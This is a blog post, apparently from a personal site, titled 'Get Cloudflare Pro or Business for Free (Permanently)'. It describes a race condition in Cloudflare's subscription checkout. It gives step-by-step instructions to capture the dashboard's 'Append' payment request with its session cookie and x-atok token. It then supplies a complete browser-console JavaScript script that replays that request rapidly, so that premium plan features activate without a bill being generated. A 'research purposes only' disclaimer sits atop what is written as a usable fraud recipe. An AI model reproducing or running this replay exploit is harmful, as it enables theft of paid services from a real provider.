[{"content":"Cloudflare Billing Logic Flaw: Bypassing Premium Subscriptions via Request Replay While reverse-engineering Cloudflare\u0026rsquo;s subscription system, I discovered an interesting \u0026ldquo;gap\u0026rdquo; between the frontend checkout logic and the backend state synchronization. By using a specific request replay technique, it is possible to trick the backend into activating the Pro or Business plan without the system generating an actual bill.\n01. Core Behavior: A \u0026ldquo;Quantum Superposition\u0026rdquo; of Identity and Permissions This bypass method places the account in a peculiar state of misalignment:\nPrivilege Escalation: The account effectively unlocks exclusive Pro/Business features (such as advanced WAF rules, image optimization, dedicated edge nodes, etc.). Logic Mismatch: The subscription management interface still displays the Free plan. Since the billing loop is never closed, the system generates no pending payment items or actual charges. Zero-Cost Operation: Exploiting the logic flaw in the checkout interface allows for \u0026ldquo;free access\u0026rdquo; to premium privileges. 02. Prerequisites Before reproducing this logic flaw, the following conditions must be met:\nDomain Onboarding: The domain has been successfully added to the Cloudflare account. Payment Environment: No valid credit card is linked to the account (or a card with a zero balance is linked to pass the initial check). Target Selection: On the Active Subscriptions page, click Change, select the Pro or Business plan you wish to activate, and proceed to the payment page. 03. Steps: Capture and Replay Using browser Developer Tools (DevTools), we can manually intervene in the checkout request.\nStep 1: Locate the Key Request Open the Network tab and click the payment button at the bottom of the page. Within the resulting traffic, locate the POST request named Append.\nStep 2: Extract Core Metadata Select the request and extract the following key parameters from the Headers and Payload sections:\nRequest URL: The full API endpoint address. Cookie: Authentication credentials for the current session. X-atok: A Cloudflare-specific CSRF/authentication token. Payload: Click View Source within the Request Payload section to retrieve the raw JSON structure. Step 3: Console Script Injection Switch to the Console tab and use the asynchronous script below to perform high-frequency replays.\n04. Automated Replay Script /**\r* Cloudflare Subscription Bypass Replay Script\r* For technical research purposes only; do not use for illegal activities.\r*/\rconst url = 'PASTE_YOUR_URL_HERE'; const headers = {\r'content-type': 'application/json',\r'accept': '*/*',\r'origin': 'https://dash.cloudflare.com',\r'referer': 'https://dash.cloudflare.com/',\r'x-atok': 'PASTE_YOUR_X_ATOK_HERE',\r'x-cross-site-security': 'dash',\r'cookie': 'PASTE_YOUR_COOKIE_HERE',\r'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36'\r};\r// Insert the payload data found in \u0026quot;View Source\u0026quot;\rconst payload = { /* ... */ };\rconst delay = ms =\u0026gt; new Promise(res =\u0026gt; setTimeout(res, ms));\r(async () =\u0026gt; {\rconsole.log(\u0026quot;%c Starting request replay...\u0026quot;, \u0026quot;color: #007aff; font-weight: bold;\u0026quot;);\rfor (let i = 0; i \u0026lt; 10; i++) {\rfetch(url, {\rmethod: 'POST',\rheaders: headers,\rbody: JSON.stringify(payload)\r})\r.then(res =\u0026gt; console.log(`[Batch ${i}] Status: ${res.status}`))\r.catch(err =\u0026gt; console.error(`[Batch ${i}] Error:`, err));\rawait delay(100); // 100ms interval to simulate concurrent race conditions\r}\rconsole.log(\u0026quot;%c Script execution complete; please refresh the dashboard to verify permissions.\u0026quot;, \u0026quot;color: #34c759; font-weight: bold;\u0026quot;);\r})();\r05. Technical Postscript The root cause of this vulnerability likely stems from how Cloudflare handled the Append operation: the system executed the permission-granting logic first, while validating the payment result asynchronously. Under rapid, concurrent requests, the backend distributed database may have experienced a temporary state synchronization lag; consequently, permissions were written to the metadata, even though the billing transaction was subsequently rolled back due to a failed payment.\nThis \u0026ldquo;board first, pay later\u0026rdquo; approach is common among SaaS platforms striving for a seamless frontend experience, yet it also offers an excellent entry point for security research.\n","permalink":"https://blog.witcorn.eu.org/en/posts/yong-jiu-bai-piao-cloudflare-pro-huo-business/","summary":"\u003ch1 id=\"cloudflare-billing-logic-flaw-bypassing-premium-subscriptions-via-request-replay\"\u003eCloudflare Billing Logic Flaw: Bypassing Premium Subscriptions via Request Replay\u003c/h1\u003e\n\u003cp\u003eWhile reverse-engineering Cloudflare\u0026rsquo;s subscription system, I discovered an interesting \u0026ldquo;gap\u0026rdquo; between the frontend checkout logic and the backend state synchronization. By using a specific \u003cstrong\u003erequest replay\u003c/strong\u003e technique, it is possible to trick the backend into activating the Pro or Business plan without the system generating an actual bill.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Screenshot\" loading=\"lazy\" src=\"/posts/yong-jiu-bai-piao-cloudflare-pro-huo-business/1.png\"\u003e\u003c/p\u003e\n\u003ch2 id=\"01-core-behavior-a-quantum-superposition-of-identity-and-permissions\"\u003e01. Core Behavior: A \u0026ldquo;Quantum Superposition\u0026rdquo; of Identity and Permissions\u003c/h2\u003e\n\u003cp\u003eThis bypass method places the account in a peculiar \u003cstrong\u003estate of misalignment\u003c/strong\u003e:\u003c/p\u003e","title":"Get Cloudflare Pro or Business for Free (Permanently)"}]